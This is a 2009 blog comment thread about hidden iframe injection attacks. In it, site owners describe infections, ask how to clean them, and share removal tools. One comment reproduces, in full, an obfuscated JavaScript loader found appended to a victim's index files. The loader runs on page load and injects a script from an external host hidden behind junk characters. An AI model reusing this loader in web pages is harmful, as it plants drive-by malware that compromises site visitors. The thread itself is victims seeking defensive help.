Comments on: Hidden iframe injection attacks

By: Konstantin Boyko

Konstantin Boyko — Thu, 24 Dec 2009 18:26:53 +0000

Please check my article about this virus:

http://justcoded.com/article/gumblar-family-virus-removal-tool/

By: leono

leono — Fri, 18 Dec 2009 14:40:23 +0000

I found the following code at last part to my index files:

/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(’script’);Xs1ya4t7ajb13i.setAttribute(‘type’, ‘text/javascript’);Xs1ya4t7ajb13i.setAttribute(‘id’, ‘myscript1′);Xs1ya4t7ajb13i.setAttribute(’src’, ‘h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#’.replace(/&|$|#|\!|$|\^|\$|@/ig, ”));Xs1ya4t7ajb13i.setAttribute(‘defer’, ‘defer’);document.body.appendChild(Xs1ya4t7ajb13i);}} catch(e) {}

what about y how I eliminate it?

By: TRouB

TRouB — Thu, 17 Dec 2009 14:22:14 +0000

thanks..

it is helpful

By: cikai

cikai — Sat, 12 Dec 2009 18:47:17 +0000

wow… thank for the information… actually the hidden iframe was for cookie stuffing blackhat… for getting affiliate cookie on people who open the website… when people click on the advertisement then they will get the profit for themself… no the web owner who display the ads…

By: Subrahmanyam

Subrahmanyam — Thu, 03 Dec 2009 12:14:39 +0000

Hi….

Thanks a billion Diovo.

Malware which effected to my site :

(document.write(”);)

I found your blog while googling about asfirey Malware.

Your code for identifying infected files worked for me.

I am able to locate where exactly Malware effected webpages on my site.

I searched, deleted infected files from my site and I uploaded new files.

Now my site if fine and opening correctly.

Thanks again!

By: Pop-zone

Pop-zone — Wed, 25 Nov 2009 09:38:24 +0000

Thanks for the informative post, and thanks those who commented with more info.

By: האתר נפרץ? חמישה כלים שיסייעו לאתר פריצה | חורים ברשת

האתר נפרץ? חמישה כלים שיסייעו לאתר פריצה | חורים ברשת — Thu, 12 Nov 2009 07:01:58 +0000

[...] עם תוסף מתאים תגלו כי הושתל בדפיו קוד זדוני או Iframes ממקורות בלתי מזוהים. כעת גם התוצאות של גוגל המובילות לבלוג כוללות אזהרה: [...]

By: Steve

Steve — Mon, 09 Nov 2009 15:18:35 +0000

If you’re on a VPS/dedicated hosting grab yourself a copy of Upload Guardian (http://www.serverprogress.com/upload_guardian.php). It scans for iframe injections and other malicious tools hackers use to modify your pages. The scanning is done on file in real-time via FTP/PHP and will block the attacker at the firewall and can send email alerts.

By: spiney

spiney — Mon, 09 Nov 2009 00:17:29 +0000

thanks for the post, this php iframe injection thing is completely new to me – so any help is good

By: adicu

adicu — Tue, 03 Nov 2009 08:53:51 +0000

Do you have any script for Cold Fusion? tq